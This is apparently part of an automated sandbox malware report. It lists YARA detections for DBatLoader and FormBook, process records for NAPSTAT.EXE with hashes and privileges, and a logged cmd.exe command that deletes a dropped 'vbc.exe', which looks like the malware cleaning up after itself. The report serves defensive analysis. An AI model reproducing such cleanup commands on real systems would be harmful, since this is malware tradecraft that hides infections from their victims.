                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583847406.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583317580.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583980388.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566467574.0000000001CEC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583904644.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583483116.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584129270.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583705715.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584336021.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583441882.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.565869963.0000000001D04000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584088819.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566017629.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566757773.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566404823.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584234578.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584506071.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583353394.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566183618.0000000001CEC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566603029.0000000001D04000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583951721.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584197318.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583532798.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584010373.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.567012932.0000000001CDC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583656067.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583176269.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566928975.0000000001D00000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583592654.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            Reputation:low

                                                            Analysis Process: NAPSTAT.EXE PID: 1708 Parent PID: 1764

                                                            General

                                                            Start time:19:34:25
                                                            Start date:02/12/2021
                                                            Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                            Imagebase:0x870000
                                                            File size:279552 bytes
                                                            MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:moderate

                                                            Analysis Process: cmd.exe PID: 2172 Parent PID: 1708

                                                            General

                                                            Start time:19:34:31
                                                            Start date:02/12/2021
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:/c del "C:\Users\Public\vbc.exe"
                                                            Imagebase:0x49e50000
                                                            File size:302592 bytes
                                                            MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Disassembly

                                                            Code Analysis

                                                            Reset < >